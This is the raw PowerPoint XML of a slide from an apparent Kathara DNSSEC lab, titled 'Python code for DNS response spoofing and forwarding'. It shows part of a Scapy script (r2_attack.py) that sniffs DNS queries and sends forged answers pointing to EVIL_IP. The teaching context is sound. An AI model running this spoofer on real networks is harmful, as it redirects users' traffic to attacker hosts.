            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{319DC315-DE58-8610-FBAC-2A79E7A4CF3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{314D8907-7CB1-E5A5-3049-94257071B764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCC93F5-0944-3026-6F13-B9B8EE3D97DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20287542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FAEDD0-F020-31E6-E884-8DB192682626}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9C94480-C8F7-9719-676E-F3F2CBC92189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01AC0E49-88A2-9269-0C2E-FBC98AF69AAD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                aa=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ra</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                an=DNSRR(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rrname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='A', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rclass</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='IN', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=600, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=EVIL_IP)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>spoofed_pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>spoofed_pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, verbose=False)            </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    sniff(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, filter=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>f"udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> port 53 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> {DNS_UNI_IP}", </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>prn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, store=0)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>except</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>KeyboardInterrupt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>print</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>("\n[*] Attack </a:t>
              </a:r>
              <a:r>
